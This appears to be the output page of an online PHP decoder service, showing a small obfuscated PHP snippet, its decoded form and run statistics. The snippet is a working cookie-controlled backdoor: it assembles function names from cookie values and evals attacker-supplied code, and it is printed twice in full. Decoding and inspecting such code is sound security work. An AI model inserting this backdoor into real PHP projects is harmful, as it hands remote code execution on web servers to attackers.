Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function clnt() { $b = $_COOKIE; ($b && isset($b[61])) ? (($gg = ..

Decoded Output download

<?php 
function clnt() { 
        $b = $_COOKIE; 
        ($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b; 
 
        return 0; 
} 
 
clnt(); ?>

Did this file decode correctly?

Original Code

<?php
function clnt() {
        $b = $_COOKIE;
        ($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;

        return 0;
}

clnt();

Function Calls

clnt 1

Variables

$b 0

Stats

MD5 1d2f95cbd7ac87e952f9f213f7bffd47
Eval Count 0
Decode Time 54 ms